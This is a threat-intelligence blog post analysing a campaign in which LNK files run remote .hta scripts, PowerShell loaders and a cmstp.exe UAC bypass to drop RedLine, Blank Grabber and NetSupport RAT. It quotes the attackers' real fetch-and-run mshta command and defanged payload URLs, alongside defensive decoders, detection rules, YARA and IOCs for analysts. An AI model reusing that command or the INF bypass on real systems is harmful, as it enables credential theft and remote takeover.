Unveiling the Stealthy Exploitation of Microsoft CMSTP Using Malicious LNK Files

Key Takeaways

  • This blog describes an infection chain that leverages the Microsoft Connection Manager Profile Installer (CMSTP.exe) for proxy execution and UAC bypass.
  • Similar VBScript and PowerShell scripts were used in past campaigns to deliver Invicta Stealer without leveraging CMSTP, indicating that the attackers may have updated their TTPs.
  • The infection chain begins with a .zip or .iso file containing a .lnk file and progresses through multiple stages that deliver distinct malware payloads.
  • The scripts employed in the intermediate stages are executed on the fly, which makes them harder to detect.

Executive Summary

In early 2022, Microsoft made an announcement about disabling macros by default in Office documents downloaded from the Internet. In response, threat actors (TAs) shifted away from malicious macros for initial access and began favoring various executable attachments, relying increasingly on malicious LNK files as the preferred method for initial access, since these can download and execute payloads. During this timeframe, Cyble Research and Intelligence Labs (CRIL) also discovered an LNK builder named "Quantum Lnk Builder" being offered on cybercrime forums.

We also observed a campaign whose infection sequence utilizes Microsoft's cmstp.exe for proxy execution. In this campaign, we identified multiple malware families, all of which were executed via cmstp.exe. Recently, CRIL uncovered the infection method of Invicta Stealer and found that it employs a similar script for fetching malware payloads. However, the infection chain used to deliver Invicta Stealer does not involve cmstp.exe, which suggests the TAs might have evolved their TTPs.

We suspect that TAs might be using spam emails to distribute the malicious attachments. This campaign's infection chain begins with a malicious .zip or .iso file. Within these archives, an LNK file serves as the trigger for a remote VBScript.

The VBScript de-obfuscates and launches a PowerShell loader, which in turn runs a PowerShell downloader. This downloader retrieves a malware payload and sometimes also a decoy file. Additionally, a malicious .inf file is dropped; when run through cmstp.exe, this .inf file becomes the conduit for launching the malware payload. The figure below shows the infection chain.

Figure 1 – Infection Chain

Initial Infection

The initial infection begins with a .zip or .iso file containing a malicious .lnk file, often disguised as a PDF. This LNK file runs a command that leads to the remote execution of an .hta file. For example, in one case the LNK file executes the following command: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S2\mh?a.* 'http[:]//a0840501.xsph[.]ru/Invoice7884993[.]hta'".

This command references a potentially malicious .hta file hosted on a remote server. The figure below shows the .lnk file.

Figure 2 – Lnk File

This command launches mshta.exe, referenced through the wildcard path mh?a.*, and executes the remote file located at "http[:]//a0840501.xsph[.]ru/Invoice7884993[.]hta". This file uses multiple layers of obfuscation to hide the malicious VBScript.

The figure below shows the process tree.

Figure 3 – Process Tree

Technical Analysis

The .hta file executed by the .lnk file consists of VBScript. In this campaign, we primarily observed two distinct obfuscation techniques applied to the VBScript. Regardless of the obfuscation method, all the VBScripts delivered a similar PowerShell loader.

First Obfuscation Technique

In this obfuscation approach, the TA hides strings as arrays of integer values. Each element is decoded by subtracting a constant from it to recover the character code; for this obfuscation layer, the constant is 44536.

The figure below shows the decoding routine in the .hta file.

Figure 4 – First Obfuscation Technique

The TA has hardcoded integer values into two arrays, which are subsequently converted into their corresponding ASCII characters. The first array decodes to a PowerShell script and the second to 'Wscript.Shell'. The script then uses the WScript.Shell Run method to execute the PowerShell script. The figure below displays the decoded content of the .hta file.

Figure 5 – Decoded Content

To recover the next-stage PowerShell loader, we wrote a simple Python script that holds the integer array and the constant and converts each element back to a character.

The figure below shows the Python script.

Figure 6 – Python Script

Second Obfuscation Technique

This obfuscation technique also derives ASCII values through numeric calculations. What is unique here is that each value is the difference between a decimal literal and a hexadecimal literal prefixed with "&H" (VBScript's hexadecimal notation); the script engine converts the hexadecimal literal to its decimal equivalent before subtracting. After de-obfuscating the data, the script runs it using the Execute function.

Figure 7 – Second Obfuscation Technique
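The decoding logic for both techniques, as an added example rather than the post's own Python script (which covers the integer-array scheme only): the first function subtracts the constant from every array element, the second evaluates concatenated Chr(<decimal> - &H<hex>) expressions the way the VBScript engine would, and a small helper recovers an unknown constant from a known plaintext prefix. The sample array and the VBScript snippet are constructed here; only the constant 44536 comes from the post. The arrays in the PowerShell downloader described later use the same scheme as the first technique and decode with the first function.

```python
"""Decoders for the two VBScript string-obfuscation schemes described above.

Added example, not the post's own script. The constant 44536 is the one named
in the post; the array and the script snippet below are constructed so the
decoders can be exercised offline."""
import re


def decode_offset_array(values, constant):
    """First technique: each element is the character code plus a constant."""
    out = []
    for v in values:
        code = v - constant
        if not 0 <= code <= 0x10FFFF:
            raise ValueError(f"{v} - {constant} is not a valid code point; wrong constant?")
        out.append(chr(code))
    return "".join(out)


def vb_hex_literal(digits):
    """Value of a VBScript &H literal.

    VBScript types a literal of up to four hex digits as a 16-bit Integer and
    up to eight as a 32-bit Long, so &HFFFF is -1 and &HFFFFFFFF is -1 too.
    Reproduce that so the arithmetic matches what the engine computes."""
    value = int(digits, 16)
    if len(digits) <= 4 and value >= 0x8000:
        value -= 0x10000
    elif len(digits) <= 8 and value >= 0x80000000:
        value -= 0x100000000
    return value


CHR_EXPR = re.compile(r"chr\(\s*(\d+)\s*-\s*&h([0-9a-f]+)\s*\)", re.IGNORECASE)


def decode_vb_subtraction(script):
    """Second technique: concatenated Chr(<decimal> - &H<hex>) expressions."""
    return "".join(chr(int(dec) - vb_hex_literal(hx))
                   for dec, hx in CHR_EXPR.findall(script))


def guess_constant(values, expected_prefix):
    """Known-plaintext trick for the first technique: assume the decoded string
    starts with expected_prefix, derive the constant from its first element and
    return it if the whole prefix then decodes correctly, else None."""
    constant = values[0] - ord(expected_prefix[0])
    decoded = decode_offset_array(values[:len(expected_prefix)], constant)
    return constant if decoded == expected_prefix else None


# Constructed sample for the first technique: "WScript.Shell" offset by 44536
SAMPLE_CONSTANT = 44536
SAMPLE_ARRAY = [44623, 44619, 44635, 44650, 44641, 44648, 44652,
                44582, 44619, 44640, 44637, 44644, 44644]

# Constructed sample for the second technique; decodes to "powershell"
SAMPLE_VBS = (
    "Execute(Chr(1234-&H462)&Chr(2000-&H761)&Chr(999-&H370)&Chr(1000-&H383)"
    "&Chr(3000-&HB46)&Chr(512-&H18D)&Chr(777-&H2A1)&Chr(1000-&H383)"
    "&Chr(640-&H214)&Chr(4096-&HF94))"
)

if __name__ == "__main__":
    print(decode_offset_array(SAMPLE_ARRAY, SAMPLE_CONSTANT))
    print(decode_vb_subtraction(SAMPLE_VBS))
    print(guess_constant(SAMPLE_ARRAY, "WScript"))
```

The range check in decode_offset_array is the quickest way to notice a wrong constant: with the right one every element lands on a printable character, with the wrong one the first out-of-range element raises immediately.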

PowerShell Loader

The PowerShell script shown in the figure below contains AES-encrypted (Advanced Encryption Standard) data stored within a variable. The script's purpose is to decrypt this data and then decompress it. The resulting content is the next-stage PowerShell downloader, which is piped to another instance of the PowerShell process.

Figure 8 – PowerShell Script

We wrote a Python script to recover the content of the next-stage downloader. The figure below shows the Python script.

Figure 9 – Python Script

PowerShell Downloader

The content of the PowerShell downloader is divided into distinct segments that use different encoding techniques. The script also contains multiple arrays that are de-obfuscated using the same approach illustrated in Figure 4.

For example, in one case these arrays decoded to the following strings:

  • Hidden
  • WebClient/
  • hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
  • hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe

The figure below shows the final PowerShell Downloader.

Figure 10 – PowerShell Downloader

This script downloads files from the following URLs and saves them to the "AppData\Roaming" directory, preserving their original names.

  • hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
  • hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe

The figure below shows the network activity.

Figure 11 – Network Activity

It downloads one clean PDF file and a RedLine stealer binary. It also opens the clean PDF to hide its malicious behavior. The figure below shows the PDF file.

Figure 12 – Clean PDF File

Leveraging CMSTP

The PowerShell downloader leverages cmstp.exe for proxy execution and UAC bypass. It uses a Set-INFFile function to create an INF (Information) file; this function takes parameters such as the location of the INF file ($InfFileLocation) and a command to execute ($CommandToExecute).

It drops a malicious .inf file named "CMSTP.inf" into the %temp% directory and executes it by starting the cmstp process (Connection Manager Profile Installer) with the arguments "/au" and "$InfFileLocation", as shown in the figure below.

Figure 13 – Executes CMSTP

Here, the script leverages the cmstp process to execute commands without triggering a UAC prompt. The RunPreSetupCommandSection of the INF file contains the path to the malware payload, so when cmstp.exe is spawned with the malicious INF as its argument, it executes the malware payload with elevated privileges. It then installs a fabricated Connection Manager service profile labeled 'Notepad'.

The figure below shows the malicious ".inf" file.

Figure 14 – INF File
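An added triage helper, not code from the post or from the malware: it parses a dropped .inf, follows the RunPreSetupCommands and RunPostSetupCommands keys of the [DefaultInstall] section to the command sections they name, and reports every command line a profile install would run, flagging those that point into user-writable locations, together with the ServiceName string that labels the profile. The INF below is constructed for the example: the payload path is a placeholder and only the section layout and the 'Notepad' label mirror what the post describes.

```python
"""Triage helper for INF files handed to cmstp.exe.

Added example, not from the post. The INF below is constructed; the payload
path is a placeholder, not an indicator from the post."""
import re

# Locations an unprivileged user can write to; a setup command that lives
# there is worth a closer look
USER_WRITABLE = re.compile(r"\\(appdata|temp|users\\public)\\", re.IGNORECASE)


def parse_inf(text):
    """Split an INF into {section_name_lower: [raw lines]}; ';' starts a comment."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def lookup(lines, key):
    """Value of a key=value entry in a section (case-insensitive key), or None."""
    for line in lines:
        k, sep, v = line.partition("=")
        if sep and k.strip().lower() == key.lower():
            return v.strip().strip('"')
    return None


def setup_commands(text):
    """Commands reachable from [DefaultInstall] via the Run*SetupCommands keys."""
    sections = parse_inf(text)
    install = sections.get("defaultinstall", [])
    found = {}
    for key in ("RunPreSetupCommands", "RunPostSetupCommands"):
        target = lookup(install, key)
        if target is not None:
            found[key] = sections.get(target.lower(), [])
    return found


def triage_inf(text):
    """Summarise what an analyst wants to know before anything else."""
    sections = parse_inf(text)
    commands = setup_commands(text)
    flagged = [c for cmds in commands.values() for c in cmds if USER_WRITABLE.search(c)]
    return {
        "commands": commands,
        "commands_in_user_writable_paths": flagged,
        "service_name": lookup(sections.get("strings", []), "ServiceName"),
    }


# Constructed sample INF (placeholder payload path; profile label mirrors the post)
SAMPLE_INF = r"""
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
C:\Users\analyst\AppData\Roaming\PLACEHOLDER_payload.exe   ; runs before the profile is installed

[Strings]
ServiceName="Notepad"
"""

if __name__ == "__main__":
    for key, value in triage_inf(SAMPLE_INF).items():
        print(f"{key}: {value}")
```

Command sections hold bare command lines rather than key=value pairs, which is why the parser keeps raw lines per section instead of using configparser; the lookup helper only interprets the entries that really are key=value.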

Malware Payloads

Blank Grabber

Blank Grabber is an open-source stealer coded in Python. This stealer is equipped with a GUI builder, which can be used to conveniently generate a stealer payload. The builder provides the option to customize stealer payloads such as UAC bypass, custom icon, and startup execution for persistence.

It has multiple anti-VM functions. It employs obfuscated code, fake errors, and EXE binding to conceal itself while capturing browser data, Discord tokens, gaming sessions, passwords, and cookies. Additionally, it steals system info, IP details, webcam images, and crypto wallets, forwarding all data through Discord Webhooks or Telegram Bot.

The figure below shows the strings associated with Blank Grabber found in the binary delivered in this campaign:

Figure 15 – Blank Grabber Strings

Redline Stealer

RedLine Stealer is one of the most prominent InfoStealers in cyberspace. It is sold on cybercrime forums and can steal data and introduce additional malware to operating systems. Cybercriminals deploy it to gain unauthorized access to sensitive information like logins, passwords, autofill data, and credit card details from Gecko and Chromium browsers. Detailed analysis of Redline Stealer can be found here.

Apart from the domain mentioned in the initial analysis, we found the following URLs delivering the Redline Stealer binary:

  • hxxp[:]//onlythefamily[.]ddns.net/crypt[.]exe
  • hxxp[:]//a0820799.xsph[.]ru/Payload[.]exe

NetSupport RAT

NetSupport Manager is a commercially available RAT (Remote Administration Tool) primarily intended for legitimate remote access to user computers by administrators. Regrettably, TAs also misuse this tool to gain unauthorized access to compromised systems. Security researcher Kostas identified an instance where NetSupport RAT was executed using cmstp, and we encountered several similar cases as well. We observed the following URL spreading NetSupport RAT:

hxxps://montec-shop[.]de/images/client32[.]exe

Conclusion

The adoption of the Microsoft Connection Manager Profile Installer (CMSTP.exe) for proxy execution and UAC bypass is a telling illustration of the attackers' adaptability. The pervasive use of obfuscation, combined with multi-stage attack sequences, underscores the perpetrators' persistent pursuit of evasion.

Previously, we’ve encountered tools like the Quantum Lnk Builder, which were available for purchase on cybercrime forums. These tools are designed to generate malicious LNK files, and their accessibility has undoubtedly facilitated TAs’ pursuits. The presence of such utilities streamlines the process for TAs to experiment with various techniques and deploy different types of attacks.

Our Recommendations

  • In this campaign, malicious INF files are distributed and executed via CMSTP.exe, so we recommend that organizations block the execution of CMSTP.exe under specific circumstances: detect instances where the command line of CMSTP.exe includes both the '/au' flag and the '\AppData\Local\Temp' string.
  • The initial infection occurs via spam email, so it is advisable to deploy effective email filtering solutions to identify and block malicious attachments.
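The first recommendation as detection logic, added here and not part of the post: it checks process-creation events (Sysmon Event ID 1 field names, JSON lines constructed below) for cmstp.exe started with /au on an INF under \AppData\Local\Temp, and adds a second, assumed rule for cmstp.exe spawned by powershell.exe, which is the parent shown in Figure 13. The events, PIDs and paths are made up for the example.

```python
"""Process-creation detection for the CMSTP recommendation above.

Added example, not from the post. Rule 1 is the post's recommendation;
rule 2 (cmstp.exe with a PowerShell parent) is this example's own addition,
derived from the process chain the post shows. Events are constructed."""
import json
import ntpath


def _basename(path):
    return ntpath.basename(path or "").lower()


def rule_cmstp_au_inf_in_temp(event):
    """The post's recommendation: cmstp.exe + '/au' + '\\AppData\\Local\\Temp'."""
    if _basename(event.get("Image")) != "cmstp.exe":
        return False
    cmd = (event.get("CommandLine") or "").lower()
    # token match for the switch so '/au' does not match a longer flag by substring
    return "/au" in cmd.split() and r"\appdata\local\temp" in cmd


def rule_cmstp_spawned_by_powershell(event):
    """Assumed rule: profile installs do not normally originate from PowerShell."""
    return (_basename(event.get("Image")) == "cmstp.exe"
            and _basename(event.get("ParentImage")) in ("powershell.exe", "pwsh.exe"))


RULES = (
    ("cmstp_au_inf_in_temp", "high", rule_cmstp_au_inf_in_temp),
    ("cmstp_spawned_by_powershell", "medium", rule_cmstp_spawned_by_powershell),
)


def evaluate(lines):
    """Apply every rule to each JSON-encoded event; return the alerts raised."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        for name, severity, check in RULES:
            if check(event):
                alerts.append({"rule": name, "severity": severity,
                               "pid": event.get("ProcessId"),
                               "command": event.get("CommandLine")})
    return alerts


# Constructed events: PIDs and paths are made up for the example
_SAMPLE = [
    {   # legitimate profile install launched by a user: no alert
        "ProcessId": 3120, "Image": r"C:\Windows\System32\cmstp.exe",
        "CommandLine": r"cmstp.exe /s C:\ProgramData\Corp\VpnProfile.inf",
        "ParentImage": r"C:\Windows\explorer.exe"},
    {   # the chain from the post: both rules fire
        "ProcessId": 4412, "Image": r"C:\Windows\System32\cmstp.exe",
        "CommandLine": r"cmstp.exe /au C:\Users\analyst\AppData\Local\Temp\CMSTP.inf",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {   # same parent, INF stored outside Temp: only the parent-based rule fires
        "ProcessId": 5120, "Image": r"C:\Windows\System32\cmstp.exe",
        "CommandLine": r"cmstp.exe /au C:\Users\analyst\AppData\Roaming\profile.inf",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {   # unrelated process: no alert
        "ProcessId": 6001, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile Get-Process",
        "ParentImage": r"C:\Windows\explorer.exe"},
]
SAMPLE_EVENTS = [json.dumps(e) for e in _SAMPLE]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert["severity"], alert["rule"], alert["pid"], alert["command"])
```

The third event is the reason for the second rule: a string match on '\AppData\Local\Temp' is exactly what the post recommends and catches this campaign, but it says nothing about an INF written to another directory, whereas the parent-process relationship is a property of the chain itself.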

MITRE ATT&CK® Techniques

Tactic                 Technique ID   Technique Name
Execution              T1204          User Execution
Persistence            T1547          Boot or Logon Autostart Execution
Privilege Escalation   T1548.002      Bypass User Account Control
Defense Evasion        T1027          Obfuscated Files or Information
                       T1036          Masquerading
                       T1218.003      System Binary Proxy Execution: CMSTP
Credential Access      T1528          Steal Application Access Token
                       T1555          Credentials from Password Stores
Discovery              T1010          Application Window Discovery
                       T1083          File and Directory Discovery
Collection             T1005          Data from the Local System
Command and Control    T1071          Application Layer Protocol
Indicators of Compromise (IOCs)

Indicators Indicator Type Description
110ea5727b750a69876de6613ba71c8f80ededd2e7cef2a276a855082affcd9f SHA256 Blank Grabber
https[:]//transfer.sh/iATCFJFn3d/Video_of%20Dollar_Recalling.exe URL Malicious URL
a6c163e45059640158828422622606f0d1608bb61ed0cb3cb27a138fe1c50c6d SHA256 Malicious HTA File
hxxp[:]//onlythefamily[.]ddns.net/crypt[.]exe URL Malicious URL
hxxp[:]//a0820799.xsph[.]ru/Payload[.]exe URL Malicious URL
27fd34dae9c30605a0739011fce957acd40c679b1b19a079946c4a6e6a0445f9 SHA256 Redline Stealer
513bc40cedbb94ee65afe77dac8464bb2693a098a15a08bb68a761acec223cdd SHA256 Redline Stealer
3225120683b1449548f441eb5649bf6efc38af4ff74975ecb203ea8766247115 SHA256 Malicious Lnk File
bbbebe67be31bcc286fe08f24ade73cb162f7f501c974151e66fc375c2f22563 SHA256 Malicious Lnk File
9905c430c3aa6e909c773af010ef8045521aba759d20a036ce065d8bf88eb9ee SHA256 Malicious HTA File
49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 SHA256 NetSupportManager
hxxps://montec-shop[.]de/images/client32[.]exe URL Malicious URL
hxxp[:]//94.156.253[.]17/Downloads/careabout[.]hta URL Malicious URL
6f08017be2fb3359cc15e2325e934465a9e7257657809f712c85f51a568e9dfc SHA256 Malicious Lnk File
0786f1889d5f3f73b5d25289b2d9d8f6a578758bc6987f88d8ae7c81c2baacd9 SHA256 Malicious Lnk File
e9abe79fceded092601af33d75859030242fd1e9ad4978cd1ceba5d9e9d88d7e SHA256 Malicious Lnk File
de3d0a11dec2e3b4afce991a690024e96dca389f8a0a3c6a65b559c9f1c12d59 SHA256 Malicious Lnk File
f9446736df6a16ba5747b617d8f69a327ec150a07f7e0adb944b65e23c2fcdc9 SHA256 Malicious Lnk File
8f65f6a346f568171760ce5b747bd6177a2e0111d37a3df5047905c4f1f86346 SHA256 Malicious Lnk File
687baa62d88a16ae54e4ff3ad584a5c7bdf71121a0fc84d863363f064cd6053b SHA256 Malicious Lnk File
1126845e909b7c776e5b48bf64db24f19b0183b7204f50aedfb8ecba52c8dcbb SHA256 Malicious Lnk File
c2807549c5965cf165839b876f8dd3ea44d51478e4cdc4dcca6146b223b0066d SHA256 Malicious Lnk File
cf8decdb1efe459a0e8d5817d209cfdd27731694956db3e111f1f8cb32456a7a SHA256 Malicious Lnk File
837f7e7a6799e25767839e487d97a5b61d9dc43add143e4b3680d756fefc1b95 SHA256 Malicious Lnk File
845087bb407b34d8003174a3b63b6c50c7ab4b13ef81636b8344740bb7a8559c SHA256 Malicious Lnk File
a2dfcc3e26858a9c730b7c10b55f82ae4dcea1a35826cfbe992287df80c4929b SHA256 Malicious Lnk File
84172e09798be8252fb18887e9cd29e47279df9641ab50185a6eea50f4c02fef SHA256 Malicious Lnk File
59b392a0ff9a3ff064b5a4ab90de5b68c758429280c612fd08f9399475d3108d SHA256 Malicious Lnk File
48cffc07e026c38234b77ca74d30a07a01f16da9d8ab24be73c934d6972f0ace SHA256 Malicious Lnk File
cc652a2be3f935f1bf3c40f7033239e09357da22f98b6abcab17bbb34266a02a SHA256 Malicious Lnk File
df86358f815e4c6760f5005a283c5e842dd7091dc328ac0f73b7667f6754c8bc SHA256 Malicious Lnk File
8b6ea98bb931bf67bcea0ff67cc5d44d956a4b3fffd1817e1f3ad89696fb3798 SHA256 Malicious Lnk File
f602321b7a764a0dffe32d9dfbac7c221fcf200f13d20e4fbfe978d56496a72b SHA256 Malicious Lnk File
d1825f07b07560f8d76c8d9125fc3029a4b328ecca836d01b5934ff8f02a32e1 SHA256 Malicious Lnk File
a08c36812818618f44782c3677c8b8b8159a1beacbad66adbe232e694d91176e SHA256 Malicious Lnk File
e9cbfe72cf4bf807f57df16611bea622c77ad501ee85c39ed171b8cdb05ba092 SHA256 Malicious Lnk File
3a00180db6da59cc44933db6faa043b1ae770098a4eb52d5c2f4cf060cb60d72 SHA256 Malicious Lnk File
7fd01399dec681c37cd14edeb37c601a85e1a3e567d0ff2accca1dad4bc9c53b SHA256 Malicious Lnk File
YARA Rule

rule Suspicious_LNK_mshta_Loader   // rule name is not given on the page; placeholder
{
    strings:
        $magic = { 4C 00 00 00 01 14 02 00 }   // .lnk HeaderSize followed by the start of LinkCLSID

        $a1 = "m*h?a" ascii wide nocase
        $a2 = "m*h*a*" ascii wide nocase
        $a3 = ".vbs" ascii wide nocase
        $a4 = "powershell" ascii wide nocase
        $a5 = ".hta" wide nocase

    condition:
        $magic at 0 and ($a1 or $a2) and ($a3 or $a4 or $a5)
}
